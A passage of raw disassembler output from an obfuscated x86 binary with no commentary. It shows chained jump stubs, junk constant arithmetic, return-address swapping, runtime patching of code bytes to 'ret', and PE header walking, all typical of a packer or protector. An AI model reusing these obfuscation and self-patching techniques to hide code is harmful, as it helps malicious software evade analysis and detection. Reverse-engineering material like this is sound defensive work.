loc_455A75:				; CODE XREF: sub_43A0C9+1F31Ej
		mov	eax, [esp+0]
		push	edx
		call	sub_44E560
		mov	eax, 99B20D50h
		call	sub_450C5A
		jmp	loc_43DE21
; END OF FUNCTION CHUNK	FOR sub_43A0C9
; ---------------------------------------------------------------------------

loc_455A8D:				; CODE XREF: hvvrg7ie:00445E89j
		jnz	loc_4533CA
		sub	esi, edx
		test	edx, 0E5CFEEF4h
		jmp	loc_44E632

; =============== S U B	R O U T	I N E =======================================



sub_455AA0	proc near		; CODE XREF: hvvrg7ie:00447C12j
					; hvvrg7ie:0045497Ap
		xchg	edi, [esp+0]
		pop	edi
		ror	eax, 7
		push	offset loc_45738B
		jmp	loc_445242
sub_455AA0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_455AB1:				; CODE XREF: sub_458F33:loc_4529E0j
		call	sub_44C072

loc_455AB6:				; CODE XREF: sub_458F33:loc_441413j
		mov	eax, 0B3h
		call	sub_457C82
		jmp	loc_439451
; END OF FUNCTION CHUNK	FOR sub_458F33
; ---------------------------------------------------------------------------
		jmp	loc_441D60

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_455ACA	proc near		; CODE XREF: sub_43E128+3A8Cp

; FUNCTION CHUNK AT 00442188 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00443820 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443B17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446A32 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044D37D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D538 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004512C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455875 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00455A5B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456D93 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00457D0C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457E83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AE09 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_443B17
sub_455ACA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		and	eax, edi
		pushf
		jmp	sub_4462F9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_138. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_455ADC	proc near		; CODE XREF: sub_43F4BC+3j

; FUNCTION CHUNK AT 00439F04 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004574D1 SIZE 00000005 BYTES

		add	esp, 0FFFFFED0h
		mov	[ebp-0Ch], ecx
		mov	[ebp-6], dx
		mov	[ebp-4], eax
		xor	eax, eax
		push	esi
		push	0BF48809Bh
		jmp	loc_439F04
sub_455ADC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_455AF9:				; CODE XREF: sub_44CEC8-BEA0j
		jb	loc_4578C9

loc_455AFF:				; CODE XREF: sub_454099-118C5j
					; sub_44CEC8:loc_44D450j
		push	0
		push	0

loc_455B03:				; CODE XREF: hvvrg7ie:loc_45445Dj
		push	10h
		mov	eax, [ebp+var_8]
		jmp	loc_455D19
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------

loc_455B0D:				; CODE XREF: hvvrg7ie:0043E6A5j
		jb	loc_4394DB

; =============== S U B	R O U T	I N E =======================================



sub_455B13	proc near		; CODE XREF: sub_44CA4B+Ap

; FUNCTION CHUNK AT 004523BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452FC3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458823 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	eax, 5753D6CBh
		mov	eax, [eax]
		jmp	loc_452FC3
sub_455B13	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_455B24:				; CODE XREF: hvvrg7ie:loc_45A13Ej
		retn
; ---------------------------------------------------------------------------

loc_455B25:				; DATA XREF: sub_44476B+12640o
		add	esi, 18E3FF37h
		xchg	esi, [esp]
		jmp	loc_43B4AD
; ---------------------------------------------------------------------------

loc_455B33:				; CODE XREF: hvvrg7ie:loc_444D41j
		test	eax, eax
		jle	loc_447CE9
		jmp	loc_44DBDC
; ---------------------------------------------------------------------------

loc_455B40:				; DATA XREF: sub_452F0E:loc_456493o
		add	edx, 0E28D08B0h
		call	sub_4405D7
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_455B4B:				; CODE XREF: sub_45488E-16627j
		jmp	loc_43BD08
; END OF FUNCTION CHUNK	FOR sub_45488E

; =============== S U B	R O U T	I N E =======================================



sub_455B50	proc near		; CODE XREF: hvvrg7ie:00447F84j
					; sub_44955C+3D42p
		xchg	edx, [esp+0]
		pop	edx
		push	eax
		call	sub_44C072

loc_455B5A:				; CODE XREF: sub_44955C+369Bj
		mov	eax, 0B2h
		jmp	sub_4498AE
sub_455B50	endp

; ---------------------------------------------------------------------------
		rol	ebx, 12h
		cmp	ebp, 0E3C99DC0h
		jmp	loc_4496F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_455B72:				; CODE XREF: sub_449CB1+2972j
		jz	loc_456CEB
		jmp	loc_455076
; END OF FUNCTION CHUNK	FOR sub_449CB1

; =============== S U B	R O U T	I N E =======================================



sub_455B7D	proc near		; DATA XREF: hvvrg7ie:0044FD74o

; FUNCTION CHUNK AT 00439473 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444A17 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044EC95 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004550F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458DC2 SIZE 00000005 BYTES

		or	edx, edx
		jnz	loc_4496E9
		jmp	loc_458DC2
sub_455B7D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_455B8A:				; CODE XREF: sub_439B29:loc_442F06j
		jnz	loc_44ADDA
		jmp	loc_440CEA
; END OF FUNCTION CHUNK	FOR sub_439B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDAE

loc_455B95:				; CODE XREF: hvvrg7ie:0043E69Fj
					; sub_43FDAE:loc_443D99j
		pop	esi
		retn
; END OF FUNCTION CHUNK	FOR sub_43FDAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_455B97:				; CODE XREF: sub_44D171+Cj
		jmp	loc_45977E
; END OF FUNCTION CHUNK	FOR sub_44616F

; =============== S U B	R O U T	I N E =======================================



sub_455B9C	proc near		; CODE XREF: sub_439AE3j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043900C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A890 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043CFDA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043F2ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004411B5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004450B2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004460DB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044984D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C861 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E26C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F3BD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044FD51 SIZE 00000005 BYTES

		push	ebx
		mov	ebx, ebp
		xchg	ebx, [esp+0]
		jmp	loc_44F3BD
sub_455B9C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	ds:dword_41D060
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF96

loc_455BAD:				; CODE XREF: sub_43AF96+1A4D3j
		jmp	loc_45B7C9
; END OF FUNCTION CHUNK	FOR sub_43AF96
; ---------------------------------------------------------------------------

loc_455BB2:				; CODE XREF: hvvrg7ie:00454108j
		jmp	locret_452D00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_455BB7:				; CODE XREF: sub_4512A0-CE2j
		jmp	loc_45267C
; END OF FUNCTION CHUNK	FOR sub_4512A0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_19. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jo	loc_454B51
		mov	eax, [esp]
		jmp	loc_44B7B7
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D18C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_20. PRESS	KEYPAD "+" TO EXPAND]
		dw 3788h
		dd 87FFFE49h, 0D78B243Ch, 5B90E95Fh
		db 0FEh, 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_455BE2	proc near		; CODE XREF: hvvrg7ie:00442F4Fj
					; sub_44E23D+244p

; FUNCTION CHUNK AT 00439070 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004406C2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00454E64 SIZE 0000001D BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	ecx, [ebp-4]
		mov	eax, 1
		shl	eax, cl
		not	eax
		jmp	loc_454E64
sub_455BE2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440631

loc_455BF7:				; CODE XREF: sub_440631:loc_439B03j
		movzx	eax, byte ptr [eax]
		mov	[ebp-1Ch], eax
		jnz	loc_458A7B
		push	offset loc_44F3DC
		jmp	sub_450974
; END OF FUNCTION CHUNK	FOR sub_440631
; ---------------------------------------------------------------------------

loc_455C0D:				; CODE XREF: hvvrg7ie:loc_455F1Ej
		retn
; ---------------------------------------------------------------------------

loc_455C0E:				; CODE XREF: hvvrg7ie:00458348j
		jmp	locret_441E8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45535C

loc_455C13:				; CODE XREF: sub_45535C-132E2j
		jmp	nullsub_409
; END OF FUNCTION CHUNK	FOR sub_45535C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_497. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_455C19:				; CODE XREF: hvvrg7ie:00440A8Fj
		jmp	loc_43CADC
; ---------------------------------------------------------------------------
		test	edi, 0DEEB7CDDh
		jmp	loc_454C08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456DE7

loc_455C29:				; CODE XREF: sub_456DE7-2EF6j
		mov	edx, [ebp+var_8]

loc_455C2C:				; CODE XREF: hvvrg7ie:0044A7A5j
		mov	eax, [ebp+var_4]
		call	nullsub_4
		pop	ecx
		pop	ecx
		pop	ebp
		jmp	loc_43ED01
; END OF FUNCTION CHUNK	FOR sub_456DE7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458374

loc_455C3C:				; CODE XREF: sub_458374-1341Fj
		rol	esi, 0Ch

loc_455C3F:				; CODE XREF: sub_458374-18264j
		push	offset loc_4411A0
		jmp	nullsub_366
; END OF FUNCTION CHUNK	FOR sub_458374
; ---------------------------------------------------------------------------

loc_455C49:				; CODE XREF: hvvrg7ie:00441181j
		push	0F45D7EE8h
		pop	edi
		and	edi, 0ABC2FF84h
		sub	edi, 4937F12h
		or	edi, 2A9F3598h
		js	loc_43A9C5
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_455C67:				; CODE XREF: sub_45038B-7766j
		jmp	loc_44666E
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
		test	esi, 7C6C29A0h
		jmp	loc_4595F7
; ---------------------------------------------------------------------------

loc_455C77:				; CODE XREF: hvvrg7ie:loc_44B51Fj
		jnz	loc_45A86F
		jmp	loc_447356
; ---------------------------------------------------------------------------

loc_455C82:				; DATA XREF: sub_450AA8-130B9o
		pop	ebx
		ror	eax, 1Ch
		push	edi
		push	0B0F0EA11h
		pop	edi
		sub	edi, 855102A9h
		test	edi, 4000h
		jmp	loc_43B48A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_455C9E:				; CODE XREF: sub_44107D+D368j
					; sub_44107D+D38Ej ...
		mov	esp, ebp
		pop	ebp
		call	sub_4572C1

loc_455CA6:				; CODE XREF: sub_446F26+6D67j
		jmp	loc_43E636
; END OF FUNCTION CHUNK	FOR sub_44107D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_455CAB:				; CODE XREF: sub_4414F6-7F8Ej
		jmp	loc_454063
; END OF FUNCTION CHUNK	FOR sub_4414F6

; =============== S U B	R O U T	I N E =======================================



sub_455CB0	proc near		; CODE XREF: hvvrg7ie:004421F3j
					; sub_43C0DE+127DEp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00443CD1 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_443CD1
sub_455CB0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	ecx
		push	0EB960FC3h
		pop	ecx
		or	ecx, 0EDAFB302h
		add	ecx, 1082119Dh
		jmp	loc_457081

; =============== S U B	R O U T	I N E =======================================



sub_455CD4	proc near		; CODE XREF: sub_45AAC8-4683p
					; hvvrg7ie:004574DEj

; FUNCTION CHUNK AT 004405FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446682 SIZE 0000000E BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edx
		push	0FAD799EDh
		pop	edx
		sub	edx, 841CAE3Fh
		rol	edx, 1Bh
		and	edx, 28B8AE42h
		jmp	loc_4405FB
sub_455CD4	endp

; ---------------------------------------------------------------------------

loc_455CF3:				; CODE XREF: hvvrg7ie:00443597j
		test	esi, ecx
		jmp	loc_456807
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_455CFA:				; CODE XREF: sub_44E533:loc_440E6Cj
		cmp	eax, 0C6F7D632h

loc_455D00:				; CODE XREF: sub_440195+596Cj
		jmp	loc_439592
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_455D05:				; CODE XREF: sub_450434-79A6j
		or	esi, 0A6D2DD00h
		rol	esi, 18h
; END OF FUNCTION CHUNK	FOR sub_450434
; START	OF FUNCTION CHUNK FOR sub_448FB0

loc_455D0E:				; CODE XREF: sub_448FB0:loc_4520C2j
		jb	loc_442E51

loc_455D14:				; CODE XREF: sub_44543A+10C01j
		jmp	loc_458B64
; END OF FUNCTION CHUNK	FOR sub_448FB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_455D19:				; CODE XREF: sub_44CEC8+8C40j
		jmp	loc_43A5DA
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518BD

loc_455D1E:				; CODE XREF: sub_4518BD-A955j
		jmp	loc_4561E4
; END OF FUNCTION CHUNK	FOR sub_4518BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_455D23:				; CODE XREF: sub_446D8D-1CC4j
		jmp	loc_44108A
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
		cmp	edx, ebx
		jmp	loc_450D5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_455D2F:				; CODE XREF: sub_43D531:loc_44BF74j
		add	esi, 5FA7BC00h
		test	eax, esi
		pop	esi
		jz	loc_4451E2
		jmp	loc_456643
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452585

loc_455D43:				; CODE XREF: sub_452585+29D5j
		call	sub_43E063
; END OF FUNCTION CHUNK	FOR sub_452585
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_455D48:				; CODE XREF: sub_43F227-120Bj
		jmp	loc_44CF47
; END OF FUNCTION CHUNK	FOR sub_43F227
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_338. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450FF2

loc_455D4E:				; CODE XREF: sub_450FF2-2F7Cj
		jmp	loc_44DC6C
; END OF FUNCTION CHUNK	FOR sub_450FF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BE8

loc_455D53:				; CODE XREF: sub_445BE8+6j
		jmp	loc_448E78
; END OF FUNCTION CHUNK	FOR sub_445BE8
; ---------------------------------------------------------------------------

locret_455D58:				; CODE XREF: hvvrg7ie:00449F9Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504E0

loc_455D59:				; CODE XREF: sub_4504E0+Cj
		jmp	loc_441FC7
; END OF FUNCTION CHUNK	FOR sub_4504E0

; =============== S U B	R O U T	I N E =======================================



sub_455D5E	proc near		; CODE XREF: hvvrg7ie:00440127j
					; sub_44C267+B25Ap

; FUNCTION CHUNK AT 0043AFA7 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [eax],	0C3h
		jmp	loc_43AFA7
sub_455D5E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_455D6A:				; CODE XREF: sub_43F227:loc_44B28Bj
		mov	eax, [esp+0Ch+var_C]
		push	edx
		mov	edx, ebx
		jmp	loc_44B1B4
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_455D75	proc near		; DATA XREF: hvvrg7ie:0045935Eo
		push	0EB086E33h
		pop	esi
		sub	esi, 0C855A060h
		add	esi, 0DD91B8A6h
		xchg	esi, [esp+0]
		jmp	sub_447162
sub_455D75	endp

; ---------------------------------------------------------------------------

loc_455D8F:				; DATA XREF: sub_44A87E+6462o
		jz	loc_440EF1
		mov	eax, [ebp-4]
		add	eax, 3Ch
		mov	eax, [eax]
		add	eax, [ebp-4]
		add	eax, 18h

loc_455DA3:				; CODE XREF: hvvrg7ie:004466EFj
		jmp	loc_43B90A

; =============== S U B	R O U T	I N E =======================================



sub_455DA8	proc near		; DATA XREF: sub_443452-91D9o

; FUNCTION CHUNK AT 0043BC96 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044944B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044D297 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004597CE SIZE 00000005 BYTES

		push	ebx
		push	0E3413113h
		pop	ebx
		sub	ebx, 0CE21A847h
		jmp	loc_4597CE
sub_455DA8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_455DBA:				; CODE XREF: sub_44989C+A436j
		mov	ebx, edx
		xchg	ebx, [esp+4+var_4]
		push	ebp
		mov	ebp, eax
		push	offset sub_447744
		jmp	loc_439A40
; END OF FUNCTION CHUNK	FOR sub_44989C

; =============== S U B	R O U T	I N E =======================================



sub_455DCC	proc near		; CODE XREF: hvvrg7ie:0044C535j
					; sub_445934+11E2Ap

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044C493 SIZE 0000000A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, edx
		call	sub_455751

loc_455DD7:				; CODE XREF: hvvrg7ie:00459F30j
		mov	eax, [esp+0]
		push	eax
		jmp	loc_44C493
sub_455DCC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441242

loc_455DE0:				; CODE XREF: sub_441242:loc_444DC8j
		pop	edx
		sub	edx, 0E4B006E3h
		add	edx, 0DA7A5F2h
		xor	edx, 4363D3A8h
		and	edx, 57109A80h
		call	sub_44403F

loc_455DFE:				; CODE XREF: sub_45ADE2+13j
		jmp	sub_44C1BB
; END OF FUNCTION CHUNK	FOR sub_441242
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4538F3

loc_455E03:				; CODE XREF: sub_4538F3-4093j
		jmp	loc_44A78E
; END OF FUNCTION CHUNK	FOR sub_4538F3
; ---------------------------------------------------------------------------

loc_455E08:				; CODE XREF: hvvrg7ie:0043A42Fj
		jmp	loc_43FC5E

; =============== S U B	R O U T	I N E =======================================



sub_455E0D	proc near		; CODE XREF: sub_44BCAE-7751p
					; hvvrg7ie:0044553Aj

arg_C		= dword	ptr  10h
arg_10		= dword	ptr  14h

; FUNCTION CHUNK AT 00450C52 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00452F6D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A393 SIZE 0000000E BYTES

		xchg	esi, [esp+0]
		pop	esi
		sub	ecx, 207D39BEh
		pop	ecx
		pop	eax
		pop	edx
		jmp	loc_45A393
sub_455E0D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A7A

loc_455E1F:				; CODE XREF: sub_450A7A+409Dj
		jns	loc_439F50
		shr	edi, 19h
		ja	loc_43FF48

loc_455E2E:				; CODE XREF: sub_450A7A:loc_43DEB5j
		add	ebx, 7ED03C11h
		call	sub_457705
; END OF FUNCTION CHUNK	FOR sub_450A7A
; START	OF FUNCTION CHUNK FOR sub_440BE2

loc_455E39:				; CODE XREF: sub_440BE2+9j
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_440BE2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_455E3E:				; CODE XREF: sub_43C290:loc_45ADFFj
		rol	ebx, 0Bh
		add	ebx, 0CE0BD045h
		xchg	ebx, [esp+4+var_4]

loc_455E4A:				; CODE XREF: hvvrg7ie:00444551j
		jmp	sub_43FC15
; END OF FUNCTION CHUNK	FOR sub_43C290
; ---------------------------------------------------------------------------

loc_455E4F:				; CODE XREF: hvvrg7ie:004468BDj
		mov	edx, [edi]
		add	eax, 0BC2E5E21h

loc_455E57:				; CODE XREF: hvvrg7ie:004468B1j
		add	esi, 3F587D55h
		mov	[esi], eax
		xchg	ebp, [esp]
		mov	esi, ebp
		pop	ebp
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_455E65:				; CODE XREF: sub_45488E-164D9j
		lea	eax, loc_44D428
		jmp	loc_451316
; END OF FUNCTION CHUNK	FOR sub_45488E
; ---------------------------------------------------------------------------

loc_455E70:				; CODE XREF: hvvrg7ie:0044ACF7j
		jnp	loc_4452B7
		not	ebx
		jmp	loc_44CC37
; ---------------------------------------------------------------------------

loc_455E7D:				; CODE XREF: hvvrg7ie:004588F5j
		jo	loc_45A4A8
		xor	eax, edx
; START	OF FUNCTION CHUNK FOR sub_4410E1

loc_455E85:				; CODE XREF: sub_4410E1:loc_4588E8j
		rol	ebx, 2
		and	ebx, 0A9C696ADh
		xor	ebx, 0D595C46Fh
		add	eax, ebx
		pop	ebx
		jmp	loc_4403E7
; END OF FUNCTION CHUNK	FOR sub_4410E1
; ---------------------------------------------------------------------------

loc_455E9C:				; CODE XREF: hvvrg7ie:00452B7Ej
		add	eax, 0F13EA3D0h
		call	sub_450C5A
		mov	ds:off_41D0D4, eax
		lea	eax, sub_4447AC
		mov	byte ptr [eax],	0C3h
		jmp	sub_4447AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_455EBB:				; CODE XREF: sub_4447ACj
		xchg	ebp, [esp+0]
		mov	edx, ebp
		jmp	loc_4429B5
; END OF FUNCTION CHUNK	FOR sub_4447AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D38

loc_455EC5:				; CODE XREF: sub_449D38+3A9j
		jz	loc_44A954

loc_455ECB:				; CODE XREF: sub_454789-5311j
		jmp	loc_44797D
; END OF FUNCTION CHUNK	FOR sub_449D38
; ---------------------------------------------------------------------------
		push	1268E9F2h
		sbb	ecx, eax
		sub	esi, 0CB91E692h
		sbb	ebp, esi
		jmp	loc_44A954
; ---------------------------------------------------------------------------

loc_455EE4:				; DATA XREF: sub_449D38+C1Fo
		add	edx, 0B4DA07Ch
		popf
		xchg	edx, [esp]
		jmp	sub_457C82
; ---------------------------------------------------------------------------
		jmp	loc_44D368
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_455EF9:				; CODE XREF: sub_453405-131EEj
		jmp	loc_445A4E
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_455EFE:				; CODE XREF: sub_44B1C6+2j
		call	sub_45974C
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_455F03:				; CODE XREF: sub_43D964-53Dj
		jmp	nullsub_388
; END OF FUNCTION CHUNK	FOR sub_43D964
; ---------------------------------------------------------------------------
		push	ebx
		push	62C45D46h
		pop	ebx
		or	ebx, 0F7DF6B19h
		rol	ebx, 17h

loc_455F18:				; CODE XREF: hvvrg7ie:0044EDC8j
		jmp	loc_43DFF5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_250. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_455F1E:				; CODE XREF: hvvrg7ie:0043FB7Aj
		jmp	loc_455C0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_455F23:				; CODE XREF: sub_43D531+Aj
		jmp	loc_43BE41
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4540B2

loc_455F28:				; CODE XREF: sub_4540B2:loc_4390B3j
		mov	ebx, eax
		xchg	ebx, [esp+0Ch+var_C]
		mov	eax, [ebp-1Ch]
		shl	eax, 2
		cdq
		js	loc_43E58B
		push	offset loc_450CA3
		jmp	nullsub_227
; END OF FUNCTION CHUNK	FOR sub_4540B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_455F44:				; CODE XREF: sub_44989C-3BECj
		jl	loc_456F53
		xchg	ebx, [eax]
		jbe	loc_450E90
		rol	eax, 9
		shr	eax, 16h
		jmp	loc_456F51
; END OF FUNCTION CHUNK	FOR sub_44989C

; =============== S U B	R O U T	I N E =======================================



sub_455F5D	proc near		; DATA XREF: sub_4396C7+11C64o

; FUNCTION CHUNK AT 00448C3A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B6C1 SIZE 0000001A BYTES

		push	486186D7h
		pop	eax
		or	eax, 2C258C67h
		rol	eax, 19h
		jmp	loc_45B6C1
sub_455F5D	endp


; =============== S U B	R O U T	I N E =======================================



sub_455F71	proc near		; DATA XREF: hvvrg7ie:0044A381o

; FUNCTION CHUNK AT 004394FB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BBD8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441162 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B661 SIZE 00000011 BYTES

		sbb	eax, eax
		neg	eax
		call	sub_44A3D7

loc_455F7A:				; CODE XREF: hvvrg7ie:0045A64Fj
		jmp	loc_4394FB
sub_455F71	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45493B

loc_455F7F:				; CODE XREF: sub_45493B-CF8Cj
		jmp	nullsub_363
; END OF FUNCTION CHUNK	FOR sub_45493B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43953B

loc_455F84:				; CODE XREF: sub_43953B+A677j
		jmp	loc_446606
; END OF FUNCTION CHUNK	FOR sub_43953B

; =============== S U B	R O U T	I N E =======================================



sub_455F89	proc near		; CODE XREF: sub_459DCDj
					; DATA XREF: sub_4550DA+4CDEo
		xchg	edx, [esp+0]
		jmp	sub_439AE3
sub_455F89	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_455F91:				; CODE XREF: sub_43F227-4064j
		mov	ebx, [ecx]
		add	edi, 0FDB1936Bh
		jmp	loc_43A589
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_455F9E:				; CODE XREF: sub_43E063+D763j
					; sub_440643:loc_4586D4j
		or	eax, 24351A3Bh
		shl	eax, 9

loc_455FA7:				; CODE XREF: hvvrg7ie:00444376j
					; sub_43E063:loc_44E957j
		push	edx
		push	9DD9B0CDh
		pop	edx
		jmp	loc_44D99F
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451DE8

loc_455FB3:				; CODE XREF: sub_451DE8:loc_443C0Dj
		mov	edx, eax
; END OF FUNCTION CHUNK	FOR sub_451DE8
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_455FB5:				; CODE XREF: sub_43A839+FA4Dj
		call	sub_452488

loc_455FBA:				; CODE XREF: hvvrg7ie:004407A7j
		jnz	loc_43CC4A
		jmp	loc_43FEEC
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_455FC5:				; CODE XREF: sub_44E3B3:loc_449AC7j
		jz	loc_44893F
		jl	loc_44070A
		mov	[edi], ecx
		sbb	edi, ecx
		jmp	loc_44C7E5
